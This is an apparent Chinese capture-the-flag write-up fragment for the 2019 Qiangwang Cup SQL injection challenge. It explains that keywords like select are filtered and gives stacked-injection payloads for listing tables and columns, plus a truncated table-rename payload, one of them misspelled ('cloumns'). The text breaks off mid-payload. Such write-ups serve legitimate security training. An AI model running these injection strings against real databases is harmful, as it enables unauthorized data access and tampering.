强网杯2019 随便注

没什么好说的,教程一搜一大堆。教程 这题过滤了select,update,where等关键字,不能使用常规的方法进行注入,能够考虑堆叠注入。table 查表名:1';show tables;#date 查列名:1';show cloumns from XXXX;#select 查看flag有两种方式:方法 一word 1';rename tables `words` to `words1`;ren
相关文章
相关标签/搜索